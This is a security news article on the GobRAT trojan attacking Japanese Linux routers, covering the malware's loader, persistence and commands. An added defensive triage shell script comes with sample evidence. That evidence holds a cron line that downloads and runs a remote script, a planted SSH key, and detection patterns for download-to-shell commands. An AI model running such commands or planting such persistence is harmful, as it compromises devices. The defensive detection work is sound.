New GobRAT Remote Access Trojan Targeting Linux Routers in Japan

May 29, 2023 | Ravi Lakshmanan | Linux / Network Security


Linux routers in Japan have been targeted by a new Golang-based Remote Access Trojan (RAT) dubbed GobRAT.

In a report released today, the JPCERT Coordination Center (JPCERT/CC) said, "The attackers first target routers whose WEBUI is exposed to the public, probably exploiting vulnerabilities to execute scripts, and eventually infect them with GobRAT."

Once an Internet-facing router is compromised, a loader script is deployed that acts as a conduit for delivering GobRAT. When launched, the malware masquerades as an Apache daemon process (apached) to evade detection.

The loader also has the ability to disable firewalls, establish persistence via a cron job, and register attacker-controlled SSH public keys in the .ssh/authorized_keys file for remote access.
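The three host-level traces described above (a process named apached, an added authorized_keys entry, and a cron persistence job) are what a responder would look for on a suspected router. The following shell helpers are an added example written for this article, not code from JPCERT/CC or from the malware report; they run offline against evidence copies (ps output, a crontab, an authorized_keys file), and the sample files, key blobs, IP address and paths they contain are constructed for illustration, not indicators from the report.

```shell
#!/bin/sh
# Added example (not from JPCERT/CC or the article): offline triage checks for the
# host-level traces the loader is described as leaving on a router. Inputs are files
# captured from the device, so the checks can run on a workstation.

# Report processes whose command name is exactly "apached".
# Input: output of `ps -eo pid,comm,args`. Legitimate Apache binaries are "apache2"
# or "httpd"; an exact match on "apached" avoids flagging them.
find_apached_procs() {
    awk 'NR > 1 && $2 == "apached" { print }' "$1"
}

# Report authorized_keys entries whose key blob is not in a known-good list.
# Usage: find_unknown_authorized_keys <authorized_keys> <known_good_keys>
# Option prefixes (e.g. no-pty,command="/bin/sh" ssh-rsa AAAA... comment) are
# handled by scanning for the key-type field and taking the blob that follows it.
find_unknown_authorized_keys() {
    awk '
        function blob(    i) {
            for (i = 1; i <= NF; i++)
                if ($i ~ /^(ssh-|ecdsa-sha2-|sk-)/) return $(i + 1)
            return ""
        }
        FILENAME == ARGV[1] { if (blob() != "") known[blob()] = 1; next }  # allow-list
        /^[[:space:]]*(#|$)/ { next }                                      # comments/blank
        { b = blob(); if (b == "" || !(b in known)) print }
    ' "$2" "$1"
}

# Report cron lines that pipe a download into a shell or run something from a
# world-writable directory, the usual shapes of a job that re-fetches a payload.
find_suspicious_cron() {
    grep -E \
        -e '(curl|wget)[^|]*\|[[:space:]]*(sh|bash)([[:space:]]|$)' \
        -e '(^|[[:space:]=])/(tmp|var/tmp|dev/shm)/' \
        "$1" || true
}

# Write constructed sample evidence (not real indicators) to a temp dir; print its path.
make_samples() {
    d=$(mktemp -d)
    cat > "$d/ps.txt" <<'EOF'
  PID COMMAND         COMMAND
  412 apache2         /usr/sbin/apache2 -k start
 1203 apached         /tmp/.X11/apached
 1377 sshd            /usr/sbin/sshd -D
EOF
    cat > "$d/known_keys" <<'EOF'
ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIKnownAdminKeyConstructedForExample admin@mgmt
EOF
    cat > "$d/authorized_keys" <<'EOF'
# keys for the admin user
ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIKnownAdminKeyConstructedForExample admin@mgmt
no-pty,command="/bin/sh" ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQUnknownKeyConstructedForExample
EOF
    cat > "$d/crontab" <<'EOF'
0 3 * * * /usr/sbin/logrotate /etc/logrotate.conf
*/5 * * * * curl -sk https://198.51.100.7/x.sh | sh
@reboot /dev/shm/.a/apached
EOF
    echo "$d"
}

# Count lines on stdin without the leading spaces some wc implementations print.
count() { wc -l | tr -d ' '; }

# Run against the constructed samples: `sh triage.sh --demo`
if [ "${1:-}" = "--demo" ]; then
    d=$(make_samples)
    echo "== apached processes";       find_apached_procs "$d/ps.txt"
    echo "== unknown authorized_keys"; find_unknown_authorized_keys "$d/authorized_keys" "$d/known_keys"
    echo "== suspicious cron";         find_suspicious_cron "$d/crontab"
    rm -rf "$d"
fi
```

On a live device, feed the functions `ps -eo pid,comm,args`, every user's `.ssh/authorized_keys`, and both the user crontabs and `/etc/cron*`. The firewall-disabling step named above leaves no file to diff offline; compare the running ruleset (`iptables-save`, or the vendor equivalent) against the device's saved configuration instead.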

GobRAT communicates with remote servers via the Transport Layer Security (TLS) protocol to receive and execute up to 22 different encrypted commands.

Some of the key commands are:

  • Get machine information
  • Run a reverse shell
  • Read and write files
  • Configure a new command-and-control (C2) server and protocol
  • Start a SOCKS5 proxy
  • Execute the file in /zone/frpc
  • Attempt to log in to sshd, Telnet, Redis, MySQL, and PostgreSQL services running on other machines

The findings come nearly three months after Lumen Black Lotus Labs revealed that business-grade routers in Latin America, Europe and North America were being spied on using malware called HiatusRAT.
